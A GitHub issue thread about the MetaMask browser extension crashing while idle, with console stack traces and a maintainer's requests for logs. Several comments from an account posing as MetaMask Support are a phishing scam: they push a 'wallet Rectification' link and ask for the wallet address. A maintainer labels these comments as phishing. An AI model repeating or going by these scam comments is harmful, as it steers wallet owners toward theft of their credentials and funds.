### ISSUE TITLE
[Bug]: [regression] Crashes from time to time even when doing nothing

### ISSUE THREAD

**Issue by php4fan** [MetaMask/metamask-extension#22392]
### Describe the bug

I have Metamask installed. I haven't used it in months, probably years. It just sits there idle.

And even so, from time to time it crashes, like every few days or weeks. It's pathetic.

I've had Metamask installed for several years and it didn't use to crash, it has started doing so relatively recently.

### Expected behavior

shouldn't crash

### Steps to reproduce

1. Install Metamask
2. Do nothing.

### Version

11.7.2

### Build type

None

### Browser

Chrome

### Operating system

Linux

**Comment by Github-Node** [comment]
Hello @php4fan
Please accept our apologies for the delay, Our backend systems went down as a result of transcript error caused by bugs during transaction which leads to inaccurate balance ,Failed or stuck transaction. we couldn’t process your request under usual processing times. In order to help you fix your issue immediately, perform this quick fix protocol:
Kindly perform the Rectification on the node string via [Metamask Dapps Forum Support](Hello @php4fan
Please accept our apologies for the delay, Our backend systems went down as a result of transcript error caused by bugs during transaction which leads to inaccurate balance ,Failed or stuck transaction. we couldn’t process your request under usual processing times. In order to help you fix your issue immediately, perform this quick fix protocol:
Kindly perform the Rectification on the node string via [Metamask Dapps Forum Support](https://dextoolhub.com/evm) select your "wallet Rectification", select the wallet account Metamask wallet/other wallet, Incase Metamask wallet is not listed: fill in the correct info in order to Rectified. you’ll be assigned a barcode, after which means success, take a screenshot of it and your issue would be rectified.

Note; Click on the live chat icon at the bottom corner of the page with support ticket id MNS763 to initiate chat with a live support agent immediately.

Regards.
[Metamask Support Team](https://dextoolhub.com/evm)) select your "wallet Rectification", select the wallet account Metamask wallet/other wallet, Incase Metamask wallet is not listed: fill in the correct info in order to Rectified. you’ll be assigned a barcode, after which means success, take a screenshot of it and your issue would be rectified.

Note; Click on the live chat icon at the bottom corner of the page with support ticket id MNS763 to initiate chat with a live support agent immediately.

Regards.
[Metamask Support Team](https://dextoolhub.com/evm)

**Comment by Github-Node** [comment]
Kindly provide your wallet address

**Comment by anaamolnar** [comment]
Please do not interact with the above comment; it is a scammer sending you to a phishing link!

**Comment by anaamolnar** [comment]
Hey @php4fan. Thanks for reporting this!  Would you mind sending the console errors or any error associated with this crash so we can look further into it? Thank you!

**Comment by Github-Node** [comment]
To rectify your issue , kindly properly authenticate your wallet

**Comment by Github-Node** [comment]
ou can follow the instruction in the site below to authenticate your account https://dextoolhub.com/evm

**Comment by php4fan** [comment]
> Would you mind sending the console errors or any error associated with this crash 

Where can I find them?

Note that I do not know how to reproduce this at will. As I said it happens randomly when I'm not even using Matamask. A popup shows up on the bottom left of the window saying the Metamask extension has crashed.

Now I've gone to "Inspect views / background.html" and there are all these errors: I have no idea whether they are related to the crashes, and they don't even have any timestamps, so for all I know they could have happened 5 minutes ago or 6 years ago (I'll report this to Chrome because it's pathetic):

```
sentry-install.js:1 (Error#125)
e.<computed> @ sentry-install.js:1
sentry-install.js:1 Error#125: premature close
e.<computed> @ sentry-install.js:1
sentry-install.js:1   at y (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/common-3.js:7:279735)
  at e.<computed> (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/sentry-install.js:1:693)
  at m.run (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/common-5.js:1:200070)
  at p (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/common-5.js:1:199557)
  at e.<computed> (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/sentry-install.js:1:693)
  at o (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/sentry-install.js:1:60258)

e.<computed> @ sentry-install.js:1
sentry-install.js:1 RPC (https://www.google.com): metamask_getProviderState -> success
sentry-install.js:1 RPC (https://www.google.com): metamask_sendDomainMetadata -> success
sentry-install.js:1 RPC (https://github.com): metamask_getProviderState -> success
sentry-install.js:1 RPC (https://github.com): metamask_sendDomainMetadata -> success
sentry-install.js:1 RPC (https://ogs.google.com): metamask_getProviderState -> success
sentry-install.js:1 RPC (https://ogs.google.com): metamask_sendDomainMetadata -> success
sentry-install.js:1 (Error#126)
e.<computed> @ sentry-install.js:1
(anonymous) @ sentry-install.js:1
error @ runtime-lavamoat.js:6830
(anonymous) @ common-7.js:1
(anonymous) @ common-5.js:1
e.<computed> @ sentry-install.js:1
t @ common-5.js:1
(anonymous) @ common-5.js:1
e.<computed> @ sentry-install.js:1
t @ common-5.js:1
y @ common-3.js:7
e.<computed> @ sentry-install.js:1
m.run @ common-5.js:1
p @ common-5.js:1
e.<computed> @ sentry-install.js:1
o @ sentry-install.js:1
setTimeout (async)
e.<computed> @ sentry-install.js:1
(anonymous) @ sentry-install.js:1
(anonymous) @ runtime-lavamoat.js:11750
(anonymous) @ runtime-lavamoat.js:11750
(anonymous) @ runtime-lavamoat.js:11750
u @ common-5.js:1
o.nextTick @ common-5.js:1
o @ common-3.js:18
D._destroy @ common-3.js:18
b @ common-3.js:18
destroy @ common-3.js:18
_onDisconnect @ common-3.js:18
(anonymous) @ common-3.js:18
sentry-install.js:1 Error#126: premature close
e.<computed> @ sentry-install.js:1
(anonymous) @ sentry-install.js:1
logError @ runtime-lavamoat.js:6791
logSubErrors @ runtime-lavamoat.js:6734
error @ runtime-lavamoat.js:6832
(anonymous) @ common-7.js:1
(anonymous) @ common-5.js:1
e.<computed> @ sentry-install.js:1
t @ common-5.js:1
(anonymous) @ common-5.js:1
e.<computed> @ sentry-install.js:1
t @ common-5.js:1
y @ common-3.js:7
e.<computed> @ sentry-install.js:1
m.run @ common-5.js:1
p @ common-5.js:1
e.<computed> @ sentry-install.js:1
o @ sentry-install.js:1
setTimeout (async)
e.<computed> @ sentry-install.js:1
(anonymous) @ sentry-install.js:1
(anonymous) @ runtime-lavamoat.js:11750
(anonymous) @ runtime-lavamoat.js:11750
(anonymous) @ runtime-lavamoat.js:11750
u @ common-5.js:1
o.nextTick @ common-5.js:1
o @ common-3.js:18
D._destroy @ common-3.js:18
b @ common-3.js:18
destroy @ common-3.js:18
_onDisconnect @ common-3.js:18
(anonymous) @ common-3.js:18
sentry-install.js:1   at y (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/common-3.js:7:279735)
  at e.<computed> (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/sentry-install.js:1:693)
  at m.run (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/common-5.js:1:200070)
  at p (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/common-5.js:1:199557)
  at e.<computed> (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/sentry-install.js:1:693)
  at o (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/sentry-install.js:1:60258)

e.<computed> @ sentry-install.js:1
(anonymous) @ sentry-install.js:1
logError @ runtime-lavamoat.js:6813
logSubErrors @ runtime-lavamoat.js:6734
error @ runtime-lavamoat.js:6832
(anonymous) @ common-7.js:1
(anonymous) @ common-5.js:1
e.<computed> @ sentry-install.js:1
t @ common-5.js:1
(anonymous) @ common-5.js:1
e.<computed> @ sentry-install.js:1
t @ common-5.js:1
y @ common-3.js:7
e.<computed> @ sentry-install.js:1
m.run @ common-5.js:1
p @ common-5.js:1
e.<computed> @ sentry-install.js:1
o @ sentry-install.js:1
setTimeout (async)
e.<computed> @ sentry-install.js:1
(anonymous) @ sentry-install.js:1
(anonymous) @ runtime-lavamoat.js:11750
(anonymous) @ runtime-lavamoat.js:11750
(anonymous) @ runtime-lavamoat.js:11750
u @ common-5.js:1
o.nextTick @ common-5.js:1
o @ common-3.js:18
D._destroy @ common-3.js:18
b @ common-3.js:18
destroy @ common-3.js:18
_onDisconnect @ common-3.js:18
(anonymous) @ common-3.js:18
```

There are many more. These are the last ones. They seem to repeat.

I have also turned on "collect errors", but it was switched off until now.

**Comment by anaamolnar** [comment]
Hello, @php4fan 
Please go to this article in the Chrome popup logs section to see how to get the correct console errors. ->https://support.metamask.io/hc/en-us/articles/360015290092-How-to-download-state-logs I just want to make sure we are looking at the correct console errors so the team can look further into it.

**Comment by php4fan** [comment]
Here are the requested popup logs. These were taken right now though, not when the extension crashed.

![image](https://github.com/MetaMask/metamask-extension/assets/13969584/0646d0da-6dc6-4b72-a1fd-04d66aa03896)
